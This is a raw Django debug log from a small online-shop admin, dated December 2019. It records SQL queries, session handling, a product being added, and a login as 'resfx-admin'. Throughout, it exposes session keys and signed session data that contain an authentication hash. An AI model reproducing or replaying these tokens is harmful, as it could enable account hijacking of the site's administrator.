"auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 12:24:33] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-05 12:25:18,163 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:25:18.152641+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 25, 18, 152641, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:25:18,166 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 12:25:18,208 utils 28908 140676850300672 (0.002) DECLARE "_django_curs_140676850300672_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 12:25:18,252 utils 28908 140676850300672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T12:25:18.250340+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 12, 25, 18, 250340, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 12:25:18] "GET /shop/product/add/ HTTP/1.0" 200 8080 DEBUG 2019-12-05 12:25:18,517 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:25:18.507487+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 25, 18, 507487, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:25:18,519 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 12:25:18] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-05 12:25:54,748 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:25:54.738545+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 25, 54, 738545, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:25:54,750 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 12:25:54,757 utils 28908 140676850300672 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-05 12:25:55,063 utils 28908 140676850300672 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 1 LIMIT 1; args=(1,) DEBUG 2019-12-05 12:25:55,072 utils 28908 140676850300672 (0.002) INSERT INTO "shop_product" ("category_id", "name", "slug", "image", "description", "price", "stock", "available", "created", "updated") VALUES (1, 'sample', 'sample', 'products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif', '', '120', 20, true, '2019-12-05T12:25:55.069599+00:00'::timestamptz, '2019-12-05T12:25:55.069657+00:00'::timestamptz) RETURNING "shop_product"."id"; args=(1, 'sample', 'sample', 'products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif', '', '120', 20, True, datetime.datetime(2019, 12, 5, 12, 25, 55, 69599, tzinfo=), datetime.datetime(2019, 12, 5, 12, 25, 55, 69657, tzinfo=)) DEBUG 2019-12-05 12:25:55,074 utils 28908 140676850300672 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-05T12:25:55.072872+00:00'::timestamptz, 6, 9, '1', 'sample', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 5, 12, 25, 55, 72872, tzinfo=), 6, 9, '1', 'sample', 1, '[{"added": {}}]') [05/Dec/2019 12:25:55] "POST /shop/product/add/ HTTP/1.0" 302 0 DEBUG 2019-12-05 12:25:55,335 utils 28908 140676850300672 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:25:55.323434+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 25, 55, 323434, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:25:55,338 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 12:25:55,342 utils 28908 140676850300672 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-05 12:25:55,343 utils 28908 140676850300672 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-05 12:25:55,347 utils 28908 140676850300672 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-05 12:25:55,457 utils 28908 140676850300672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T12:25:55.455485+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 12, 25, 55, 455485, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 12:25:55] "GET /shop/product/ HTTP/1.0" 200 8597 DEBUG 2019-12-05 12:25:55,719 utils 28908 140676850300672 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:25:55.707023+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 25, 55, 707023, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:25:55,729 utils 28908 140676850300672 (0.007) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 12:25:55] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 12:25:56] "GET /static/admin/img/sorting-icons.svg HTTP/1.0" 200 1097 [05/Dec/2019 12:26:19] "GET / HTTP/1.0" 302 0 [05/Dec/2019 12:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [05/Dec/2019 12:31:22] "GET / HTTP/1.0" 302 0 [05/Dec/2019 12:36:36] "GET / HTTP/1.0" 302 0 [05/Dec/2019 12:41:39] "GET / HTTP/1.0" 302 0 [05/Dec/2019 12:49:28] "GET / HTTP/1.0" 302 0 [05/Dec/2019 12:54:48] "GET / HTTP/1.0" 302 0 [05/Dec/2019 12:59:50] "GET / HTTP/1.0" 302 0 [05/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [05/Dec/2019 13:10:41] "GET / HTTP/1.0" 302 0 [05/Dec/2019 13:12:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 13:12:12,001 utils 28908 140676850300672 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bvkywebvwia0hbuhs8t8q42y56dnpfqm' LIMIT 1; args=('bvkywebvwia0hbuhs8t8q42y56dnpfqm',) DEBUG 2019-12-05 13:12:12,004 utils 28908 140676850300672 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bvkywebvwia0hbuhs8t8q42y56dnpfqm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T13:12:12.002583+00:00'::timestamptz); args=('bvkywebvwia0hbuhs8t8q42y56dnpfqm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 13, 12, 12, 2583, tzinfo=)) [05/Dec/2019 13:12:12] "GET /login/?next=/ HTTP/1.0" 200 1786 [05/Dec/2019 13:12:12] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [05/Dec/2019 13:12:12] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [05/Dec/2019 13:12:12] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [05/Dec/2019 13:12:12] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [05/Dec/2019 13:12:13] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [05/Dec/2019 13:12:13] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 DEBUG 2019-12-05 13:12:16,438 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:12:16.429536+00:00'::timestamptz AND "django_session"."session_key" = 'bvkywebvwia0hbuhs8t8q42y56dnpfqm'); args=(datetime.datetime(2019, 12, 5, 13, 12, 16, 429536, tzinfo=), 'bvkywebvwia0hbuhs8t8q42y56dnpfqm') DEBUG 2019-12-05 13:12:16,443 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx-admin'; args=('resfx-admin',) DEBUG 2019-12-05 13:12:16,682 utils 28908 140676876654336 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg' LIMIT 1; args=('bqitwb1civrez1kolhip93czzgwgpjpg',) DEBUG 2019-12-05 13:12:16,684 utils 28908 140676876654336 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bqitwb1civrez1kolhip93czzgwgpjpg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T13:12:16.682799+00:00'::timestamptz); args=('bqitwb1civrez1kolhip93czzgwgpjpg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 13, 12, 16, 682799, tzinfo=)) DEBUG 2019-12-05 13:12:16,685 utils 28908 140676876654336 (0.001) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = 'bvkywebvwia0hbuhs8t8q42y56dnpfqm'; args=('bvkywebvwia0hbuhs8t8q42y56dnpfqm',) DEBUG 2019-12-05 13:12:16,687 utils 28908 140676876654336 (0.001) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('bvkywebvwia0hbuhs8t8q42y56dnpfqm'); args=('bvkywebvwia0hbuhs8t8q42y56dnpfqm',) DEBUG 2019-12-05 13:12:16,690 utils 28908 140676876654336 (0.001) UPDATE "auth_user" SET "last_login" = '2019-12-05T13:12:16.688456+00:00'::timestamptz WHERE "auth_user"."id" = 6; args=(datetime.datetime(2019, 12, 5, 13, 12, 16, 688456, tzinfo=), 6) DEBUG 2019-12-05 13:12:16,694 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:12:16.692753+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 12, 16, 692753, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:12:16] "POST /login/?next=/ HTTP/1.0" 302 0 DEBUG 2019-12-05 13:12:16,984 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:12:16.976244+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 12, 16, 976244, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:12:16,987 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:12:17,017 utils 28908 140676876654336 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-05 13:12:17,021 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:12:17.020572+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 12, 17, 20572, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:12:17] "GET / HTTP/1.0" 200 6893 [05/Dec/2019 13:12:17] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [05/Dec/2019 13:12:17] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [05/Dec/2019 13:12:17] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [05/Dec/2019 13:12:17] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 DEBUG 2019-12-05 13:12:33,150 utils 28908 140676876654336 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:12:33.138453+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 12, 33, 138453, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:12:33,155 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:12:33,161 utils 28908 140676876654336 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-05 13:12:33,162 utils 28908 140676876654336 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-05 13:12:33,169 utils 28908 140676876654336 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-05 13:12:33,345 utils 28908 140676876654336 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:12:33.341627+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 12, 33, 341627, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:12:33] "GET /shop/product/ HTTP/1.0" 200 8423 [05/Dec/2019 13:12:33] "GET /static/admin/css/changelists.css HTTP/1.0" 200 6170 [05/Dec/2019 13:12:33] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [05/Dec/2019 13:12:33] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 DEBUG 2019-12-05 13:12:33,670 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:12:33.658864+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 12, 33, 658864, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:12:33,673 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 13:12:33] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 13:12:33] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [05/Dec/2019 13:12:33] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [05/Dec/2019 13:12:33] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [05/Dec/2019 13:12:33] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [05/Dec/2019 13:12:33] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [05/Dec/2019 13:12:34] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [05/Dec/2019 13:12:34] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [05/Dec/2019 13:12:34] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [05/Dec/2019 13:12:35] "GET /static/admin/img/sorting-icons.svg HTTP/1.0" 200 1097 [05/Dec/2019 13:12:35] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331 DEBUG 2019-12-05 13:12:38,281 utils 28908 140676876654336 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:12:38.267817+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 12, 38, 267817, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:12:38,285 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:12:38,289 utils 28908 140676876654336 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 1; args=(1,) DEBUG 2019-12-05 13:12:38,343 utils 28908 140676876654336 (0.002) DECLARE "_django_curs_140676876654336_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 13:12:38,407 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:12:38.405179+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 12, 38, 405179, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:12:38] "GET /shop/product/1/change/ HTTP/1.0" 200 8721 DEBUG 2019-12-05 13:12:38,673 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:12:38.663788+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 12, 38, 663788, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 